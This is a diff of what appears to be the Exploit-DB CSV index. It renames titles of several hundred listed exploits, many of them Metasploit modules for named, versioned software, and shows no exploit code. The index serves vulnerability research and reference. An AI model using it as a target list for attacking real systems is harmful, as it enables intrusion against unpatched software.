(Metasploit)",2010-11-24,Metasploit,multiple,remote,8080 -16790,platforms/windows/dos/16790.rb,"PSO Proxy 0.91 - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,dos,8080 +16790,platforms/windows/dos/16790.rb,"PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,dos,8080 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs - 'webquery.dll' Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,80 16794,platforms/windows/remote/16794.rb,"httpdx - tolog() Function Format String (2)",2010-08-25,Metasploit,windows,remote,80 16795,platforms/cgi/remote/16795.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,cgi,remote,0 16796,platforms/windows/remote/16796.rb,"BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote,80 -16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager - ovalarm.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 -16798,platforms/windows/remote/16798.rb,"Apache mod_jk 1.2.20 - Buffer Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 +16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager (OV NNM) - ovalarm.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 +16798,platforms/windows/remote/16798.rb,"Apache Tomcat mod_jk 1.2.20 - Buffer Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 16799,platforms/windows/remote/16799.rb,"httpdx - h_handlepeer() Function Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0 16800,platforms/windows/remote/16800.rb,"Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow (Metasploit)",2010-06-11,Metasploit,windows,remote,8000 16801,platforms/windows/remote/16801.rb,"CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,5250 @@ -14620,23 +14620,23 @@ id,file,description,date,author,platform,type,port 16805,platforms/windows/remote/16805.rb,"HP OpenView Network Node Manager - OpenView5.exe CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 16806,platforms/windows/remote/16806.rb,"BadBlue 2.72b - PassThru Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote,0 16807,platforms/windows/remote/16807.rb,"InterSystems Cache - UtilConfigHome.csp Argument Buffer Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,57772 -16808,platforms/windows/remote/16808.rb,"NaviCOPA 2.0.1 - URL Handling Buffer Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80 +16808,platforms/windows/remote/16808.rb,"NaviCOPA Web Server 2.0.1 - URL Handling Buffer Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80 16809,platforms/win_x86/remote/16809.rb,"Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,8080 16810,platforms/windows/remote/16810.rb,"IBM TPM for OS Deployment 5.1.0.x - rembo.exe Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,443 16811,platforms/windows/remote/16811.rb,"TrackerCam - PHP Argument Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8090 -16812,platforms/windows/remote/16812.rb,"MDaemon 6.8.5 - WorldClient form2raw.cgi Stack Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,3000 +16812,platforms/windows/remote/16812.rb,"Alt-N MDaemon 6.8.5 - WorldClient form2raw.cgi Stack Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,3000 16813,platforms/windows/remote/16813.rb,"Novell NetMail 3.52d - NMAP STOR Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,689 16814,platforms/windows/remote/16814.rb,"Novell Groupwise Messenger Client - Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,8300 16815,platforms/windows/remote/16815.rb,"Novell ZENworks 6.5 - Desktop/Server Management Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 16816,platforms/windows/remote/16816.rb,"GAMSoft TelSrv 1.5 - 'Username' Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,23 16817,platforms/windows/remote/16817.rb,"GoodTech Telnet Server 5.0.6 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,2380 -16818,platforms/windows/remote/16818.rb,"YPOPS 0.6 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,25 +16818,platforms/windows/remote/16818.rb,"YahooPOPs (YPOPS) 0.6 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,25 16819,platforms/windows/remote/16819.rb,"SoftiaCom wMailServer 1.0 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,25 16820,platforms/windows/remote/16820.rb,"Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)",2010-11-11,Metasploit,windows,remote,25 -16821,platforms/windows/remote/16821.rb,"Mercury Mail SMTP AUTH CRAM-MD5 - Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,25 +16821,platforms/windows/remote/16821.rb,"Mercury/32 Mail SMTPD - AUTH CRAM-MD5 Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,25 16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,25 16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 - LDAP Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,389 -16824,platforms/windows/remote/16824.rb,"IMail LDAP Service - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,389 +16824,platforms/windows/remote/16824.rb,"IPSwitch IMail LDAP Daemon/Service - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,389 16825,platforms/windows/remote/16825.rb,"CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16826,platforms/windows/remote/16826.rb,"Symantec Alert Management System Intel Alert Originator Service - Buffer Overflow (Metasploit)",2010-05-13,Metasploit,windows,remote,38292 16827,platforms/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 @@ -14653,12 +14653,12 @@ id,file,description,date,author,platform,type,port 16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (2)",2011-03-03,Metasploit,linux,remote,0 16839,platforms/linux/remote/16839.rb,"Borland Interbase - PWD_db_aliased() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16840,platforms/linux/remote/16840.rb,"Borland Interbase - open_marker_file() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 -16841,platforms/linux/remote/16841.rb,"GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 +16841,platforms/linux/remote/16841.rb,"Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16842,platforms/linux/remote/16842.rb,"LPRng - use_syslog Remote Format String (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16843,platforms/linux/remote/16843.rb,"Borland Interbase - jrd8_create_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16844,platforms/linux/remote/16844.rb,"Borland Interbase - INET_connect() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 -16845,platforms/linux/remote/16845.rb,"Poptop - Negative Read Overflow (Metasploit)",2010-11-23,Metasploit,linux,remote,0 -16846,platforms/linux/remote/16846.rb,"UoW IMAP server - LSUB Buffer Overflow (Metasploit)",2010-03-26,Metasploit,linux,remote,0 +16845,platforms/linux/remote/16845.rb,"PoPToP - Negative Read Overflow (Metasploit)",2010-11-23,Metasploit,linux,remote,0 +16846,platforms/linux/remote/16846.rb,"UoW IMAPd Server - LSUB Buffer Overflow (Metasploit)",2010-03-26,Metasploit,linux,remote,0 16847,platforms/linux/remote/16847.rb,"Squid - NTLM Authenticate Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0 16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0 16849,platforms/linux/remote/16849.rb,"MySQL yaSSL (Linux) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,linux,remote,0 @@ -14668,44 +14668,44 @@ id,file,description,date,author,platform,type,port 16853,platforms/linux/remote/16853.rb,"Berlios GPSD - Format String (Metasploit)",2010-04-30,Metasploit,linux,remote,0 16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0 16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0 -16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTP Daemon - Arbitrary Command Execution (Metasploit)",2010-07-07,Metasploit,cgi,webapps,0 +16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTPd Daemon/Service - Arbitrary Command Execution (Metasploit)",2010-07-07,Metasploit,cgi,webapps,0 16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise - masterCGI Arbitrary Command Execution (Metasploit)",2010-10-05,Metasploit,cgi,webapps,0 16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package - passwd.php3 Arbitrary Command Execution (Metasploit)",2010-10-18,Metasploit,php,webapps,0 16859,platforms/linux/remote/16859.rb,"Samba (Linux) - lsa_io_trans_names Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0 16860,platforms/linux/remote/16860.rb,"Samba (Linux/x86) - chain_reply Memory Corruption (Metasploit)",2010-09-04,Metasploit,linux,remote,0 -16861,platforms/linux/remote/16861.rb,"Samba (Linux/x86) - trans2open Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0 -16862,platforms/hardware/remote/16862.rb,"iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1)",2010-09-20,Metasploit,hardware,remote,0 -16863,platforms/osx/remote/16863.rb,"AppleFileServer - LoginExt PathName Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0 +16861,platforms/linux/remote/16861.rb,"Samba (Linux x86) - trans2open Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0 +16862,platforms/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1)",2010-09-20,Metasploit,hardware,remote,0 +16863,platforms/osx/remote/16863.rb,"AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0 16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 -16865,platforms/osx/remote/16865.rb,"Arkeia Backup Client Type 77 (OSX) - Overflow Exploit (Metasploit)",2010-05-09,Metasploit,osx,remote,0 -16866,platforms/unix/remote/16866.rb,"Safari - Archive Metadata Command Execution (Metasploit)",2010-09-20,Metasploit,unix,remote,0 +16865,platforms/osx/remote/16865.rb,"Knox Arkeia Backup Client Type 77 (OSX) - Overflow Exploit (Metasploit)",2010-05-09,Metasploit,osx,remote,0 +16866,platforms/unix/remote/16866.rb,"Apple Safari - Archive Metadata Command Execution (Metasploit)",2010-09-20,Metasploit,unix,remote,0 16867,platforms/osx/remote/16867.rb,"Apple Mac OSX Software Update - Command Execution (Metasploit)",2010-09-20,Metasploit,osx,remote,0 -16868,platforms/hardware/remote/16868.rb,"iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)",2010-09-20,Metasploit,hardware,remote,0 +16868,platforms/hardware/remote/16868.rb,"Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)",2010-09-20,Metasploit,hardware,remote,0 16869,platforms/hardware/remote/16869.rb,"iPhone MobileMail - LibTIFF Buffer Overflow (Metasploit)",2010-09-20,Metasploit,hardware,remote,0 -16870,platforms/multiple/remote/16870.rb,"Mail.app - Image Attachment Command Execution (Metasploit)",2011-03-05,Metasploit,multiple,remote,0 +16870,platforms/multiple/remote/16870.rb,"Apple Mail.app - Image Attachment Command Execution (Metasploit)",2011-03-05,Metasploit,multiple,remote,0 16871,platforms/osx/remote/16871.rb,"Apple Mac OSX - mDNSResponder UPnP Location Overflow (Metasploit)",2011-01-08,Metasploit,osx,remote,0 16872,platforms/osx/remote/16872.rb,"WebSTAR FTP Server - USER Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0 -16873,platforms/osx/remote/16873.rb,"Apple Mac OSX QuickTime - RTSP Content-Type Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 -16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam - HTTP GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 +16873,platforms/osx/remote/16873.rb,"Apple QuickTime (Mac OSX) - RTSP Content-Type Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 +16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0 16875,platforms/osx/remote/16875.rb,"Samba (OSX) - lsa_io_trans_names Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0 16876,platforms/osx_ppc/remote/16876.rb,"Samba (OSX/PPC) - trans2open Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0 16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter - Command Execution (Metasploit) (2)",2010-10-06,Metasploit,irix,remote,0 16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0 16879,platforms/freebsd/remote/16879.rb,"Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,freebsd,remote,0 -16880,platforms/linux/remote/16880.rb,"Samba trans2open (*BSD/x86) - Overflow Exploit (Metasploit)",2010-06-17,Metasploit,linux,remote,0 +16880,platforms/linux/remote/16880.rb,"Samba (*BSD x86) - trans2open Overflow Exploit (Metasploit)",2010-06-17,Metasploit,linux,remote,0 16881,platforms/php/webapps/16881.rb,"Cacti - graph_view.php Remote Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 -16882,platforms/php/webapps/16882.rb,"PHP XML-RPC - Arbitrary Code Execution (Metasploit)",2010-07-25,Metasploit,php,webapps,0 +16882,platforms/php/webapps/16882.rb,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit)",2010-07-25,Metasploit,php,webapps,0 16883,platforms/php/webapps/16883.rb,"Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)",2010-07-25,Metasploit,php,webapps,0 16885,platforms/php/webapps/16885.rb,"TikiWiki jhot - Remote Command Execution (Metasploit)",2010-07-25,Metasploit,php,webapps,0 -16886,platforms/cgi/webapps/16886.rb,"AWStats 6.4 < 6.5 migrate - Remote Command Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps,0 -16887,platforms/linux/remote/16887.rb,"HP Openview - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0 +16886,platforms/cgi/webapps/16886.rb,"AWStats 6.4 < 6.5 - migrate Remote Command Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps,0 +16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP)",2010-08-25,Metasploit,linux,remote,0 16889,platforms/linux/webapps/16889.rb,"Redmine SCM Repository 0.9.x / 1.0.x - Arbitrary Command Execution (Metasploit)",2011-01-08,Metasploit,linux,webapps,0 16890,platforms/php/webapps/16890.rb,"phpBB - viewtopic.php Arbitrary Code Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16891,platforms/cgi/webapps/16891.rb,"QuickTime Streaming Server - parse_xml.cgi Remote Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps,0 16892,platforms/php/webapps/16892.rb,"TWiki History TWikiUsers - rev Parameter Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16893,platforms/cgi/webapps/16893.rb,"Barracuda - IMG.pl Remote Command Execution (Metasploit)",2010-04-30,Metasploit,cgi,webapps,0 -16894,platforms/php/webapps/16894.rb,"TWiki Search Function - Arbitrary Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 +16894,platforms/php/webapps/16894.rb,"TWiki - Search Function Arbitrary Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16895,platforms/php/webapps/16895.rb,"WordPress 1.5.1.3 - 'cache_lastpostdate' Arbitrary Code Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16896,platforms/php/webapps/16896.rb,"vBulletin - misc.php Template Name Arbitrary Code Execution (Metasploit)",2010-07-25,Metasploit,php,webapps,0 16897,platforms/php/webapps/16897.rb,"BASE - base_qry_common Remote File Inclusion (Metasploit)",2010-11-24,Metasploit,php,webapps,0 @@ -14723,7 +14723,7 @@ id,file,description,date,author,platform,type,port 16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula - Remote PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,webapps,0 16912,platforms/php/webapps/16912.rb,"Mambo - Cache_Lite Class MosConfig_absolute_path Remote File Inclusion (Metasploit)",2010-11-24,Metasploit,php,webapps,0 16913,platforms/php/webapps/16913.rb,"phpMyAdmin - Config File Code Injection (Metasploit)",2010-07-03,Metasploit,php,webapps,0 -16914,platforms/cgi/webapps/16914.rb,"Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps,0 +16914,platforms/cgi/webapps/16914.rb,"The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)",2010-07-03,Metasploit,cgi,webapps,0 16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent - Command Injection (Metasploit)",2010-10-25,Metasploit,linux,remote,0 16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution (Metasploit)",2011-03-03,Metasploit,linux,remote,0 16917,platforms/php/webapps/16917.rb,"Dogfood CRM - spell.php Remote Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 @@ -14764,7 +14764,7 @@ id,file,description,date,author,platform,type,port 16953,platforms/asp/webapps/16953.txt,"Luch Web Designer - Multiple SQL Injections",2011-03-10,p0pc0rn,asp,webapps,0 16954,platforms/php/webapps/16954.txt,"Keynect eCommerce - SQL Injection",2011-03-10,"Arturo Zamora",php,webapps,0 16955,platforms/asp/webapps/16955.txt,"SmarterMail 7.3 / 7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps,0 -16956,platforms/windows/remote/16956.rb,"Novell iPrint Client ActiveX Control 5.52 - Buffer Overflow (Metasploit)",2011-03-07,Metasploit,windows,remote,0 +16956,platforms/windows/remote/16956.rb,"Novell iPrint Client 5.52 - ActiveX Control Buffer Overflow (Metasploit)",2011-03-07,Metasploit,windows,remote,0 16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows - Payload Execution (Metasploit)",2011-03-08,Metasploit,windows,remote,0 16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic - Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 16960,platforms/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,linux,dos,0 @@ -14776,7 +14776,7 @@ id,file,description,date,author,platform,type,port 16966,platforms/linux/dos/16966.php,"PHP 5.3.6 - shmop_read() Integer Overflow Denial of Service",2011-03-12,"Jose Carlos Norte",linux,dos,0 16968,platforms/php/webapps/16968.txt,"Cover Vision - SQL Injection",2011-03-13,Egyptian.H4x0rz,php,webapps,0 16969,platforms/php/webapps/16969.txt,"Log1 CMS 2.0 - Multiple Vulnerabilities",2011-03-14,Aodrulez,php,webapps,0 -16970,platforms/windows/remote/16970.rb,"Kolibri 2.0 - HTTP Server HEAD Buffer Overflow (Metasploit)",2011-08-03,Metasploit,windows,remote,0 +16970,platforms/windows/remote/16970.rb,"Kolibri HTTP Server 2.0 - HEAD Buffer Overflow (Metasploit)",2011-08-03,Metasploit,windows,remote,0 16971,platforms/windows/local/16971.py,"ABBS Audio Media Player - '.m3u' / '.LST' Buffer Overflow",2011-03-14,Rh0,windows,local,0 16972,platforms/ios/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,ios,remote,0 16973,platforms/linux/dos/16973.c,"Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak Exploit",2011-03-14,prdelka,linux,dos,0 @@ -14824,29 +14824,29 @@ id,file,description,date,author,platform,type,port 17021,platforms/windows/dos/17021.py,"SpoonFTP 1.2 - RETR Denial of Service",2011-03-21,"C4SS!0 G0M3S",windows,dos,0 17022,platforms/windows/remote/17022.txt,"siemens tecnomatix factorylink 8.0.1.1473 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 17023,platforms/windows/dos/17023.txt,"iconics genesis32 and genesis64 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 -17024,platforms/windows/remote/17024.txt,"7-Technologies igss 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 +17024,platforms/windows/remote/17024.txt,"7-Technologies IGSS 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 17025,platforms/windows/dos/17025.txt,"DATAC RealWin - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 17026,platforms/windows/webapps/17026.txt,"Symantec LiveUpdate Administrator Management GUI - HTML Injection",2011-03-23,"Nikolas Sotiriu",windows,webapps,0 17027,platforms/windows/remote/17027.rb,"Adobe Flash Player - AVM Bytecode Verification (Metasploit)",2011-03-23,Metasploit,windows,remote,0 -17028,platforms/windows/remote/17028.rb,"HP OpenView NNM - nnmRptConfig nameParams Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 -17029,platforms/windows/remote/17029.rb,"HP NNM - CGI webappmon.exe OvJavaLocale Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 -17030,platforms/windows/remote/17030.rb,"HP NNM - CGI webappmon.exe execvp Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 +17028,platforms/windows/remote/17028.rb,"HP OpenView Network Node Manager (OV NNM) - nnmRptConfig nameParams Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 +17029,platforms/windows/remote/17029.rb,"HP Network Node Manager (NMM) - CGI webappmon.exe OvJavaLocale Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 +17030,platforms/windows/remote/17030.rb,"HP Network Node Manager (NMM) - CGI webappmon.exe execvp Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 17031,platforms/linux/remote/17031.rb,"Distributed Ruby - send syscall (Metasploit)",2011-03-23,Metasploit,linux,remote,0 17032,platforms/windows/dos/17032.txt,"VMCPlayer 1.0 - Denial of Service",2011-03-23,BraniX,windows,dos,0 17033,platforms/windows/dos/17033.py,"IGSS 8 ODBC Server - Multiple Remote Uninitialized Pointer Free Denial of Service",2011-03-23,"Jeremy Brown",windows,dos,0 17034,platforms/windows/remote/17034.py,"Progea Movicon 11 - TCPUploadServer Remote Exploit",2011-03-23,"Jeremy Brown",windows,remote,0 17035,platforms/php/webapps/17035.pl,"Constructr CMS 3.03 - Arbitrary File Upload",2011-03-23,plucky,php,webapps,0 17036,platforms/asp/webapps/17036.txt,"Web Wiz Forum - Injection",2011-03-23,eXeSoul,asp,webapps,0 -17038,platforms/windows/remote/17038.rb,"HP OpenView NNM - nnmRptConfig.exe schdParams Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 +17038,platforms/windows/remote/17038.rb,"HP OpenView Network Node Manager (OV NNM) - nnmRptConfig.exe schdParams Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 17039,platforms/windows/remote/17039.rb,"HP OpenView Network Node Manager - snmpviewer.exe Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 -17040,platforms/windows/remote/17040.rb,"HP OpenView Network Node Manager - getnnmdata.exe (ICount) CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 -17041,platforms/windows/remote/17041.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe main Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 -17042,platforms/windows/remote/17042.rb,"HP OpenView Network Node Manager - getnnmdata.exe (MaxAge) CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 +17040,platforms/windows/remote/17040.rb,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (ICount) CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 +17041,platforms/windows/remote/17041.rb,"HP OpenView Network Node Manager (OV NNM) - ovwebsnmpsrv.exe main Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,80 +17042,platforms/windows/remote/17042.rb,"HP OpenView Network Node Manager (OV NNM) getnnmdata.exe (MaxAge) CGI Buffer Overflow (Metasploit)",2011-03-24,Metasploit,windows,remote,80 17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe ovutil Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0 17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - Denial of Service",2011-03-24,"Craig Freyman",windows,dos,69 17046,platforms/php/webapps/17046.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (2)",2011-03-24,"High-Tech Bridge SA",php,webapps,0 -17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager - getnnmdata.exe (Hostname) CGI Buffer Overflow (Metasploit)",2011-03-25,Metasploit,windows,remote,0 +17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (Hostname) CGI Buffer Overflow (Metasploit)",2011-03-25,Metasploit,windows,remote,0 17048,platforms/windows/remote/17048.rb,"VideoLAN VLC Media Player - AMV Dangling Pointer (Metasploit)",2011-03-26,Metasploit,windows,remote,0 17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 - (POST) Persistent Cross-Site Scripting / XML Injection",2011-03-26,LiquidWorm,php,webapps,0 17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0 @@ -14941,7 +14941,7 @@ id,file,description,date,author,platform,type,port 17150,platforms/windows/local/17150.rb,"AOL Desktop 9.6 - RTX Buffer Overflow (Metasploit)",2011-04-08,Metasploit,windows,local,0 17151,platforms/windows/remote/17151.rb,"IBM Lotus Domino iCalendar - MAILTO Buffer Overflow (Metasploit)",2011-04-04,Metasploit,windows,remote,25 17152,platforms/windows/remote/17152.rb,"ManageEngine Applications Manager - Authenticated Code Execution (Metasploit)",2011-04-08,Metasploit,windows,remote,9090 -17153,platforms/windows/local/17153.rb,"VeryTools Video Spirit Pro 1.70 - '.visprj' Buffer Overflow (Metasploit)",2011-04-11,Metasploit,windows,local,0 +17153,platforms/windows/local/17153.rb,"VeryTools VideoSpirit Pro 1.70 - '.visprj' Buffer Overflow (Metasploit)",2011-04-11,Metasploit,windows,local,0 17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console - 'st_upload' Remote Code Execution",2011-04-12,"Gerry Eisenhaur",windows,remote,0 17156,platforms/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",windows,remote,0 17157,platforms/windows/local/17157.py,"Wordtrainer 3.0 - '.ord' Buffer Overflow",2011-04-12,"C4SS!0 G0M3S",windows,local,0 @@ -14994,7 +14994,7 @@ id,file,description,date,author,platform,type,port 17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 - SEH Unicode Buffer Overflow",2011-04-27,"Brandon Murphy",windows,local,0 17218,platforms/php/webapps/17218.txt,"Symphony CMS 2.1.2 - Blind SQL Injection",2011-04-27,Wireghoul,php,webapps,0 17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)",2011-04-27,Metasploit,windows,remote,18821 -17220,platforms/php/webapps/17220.txt,"eyeos 1.9.0.2 - Persistent Cross-Site Scripting using image files",2011-04-28,"Alberto Ortega",php,webapps,0 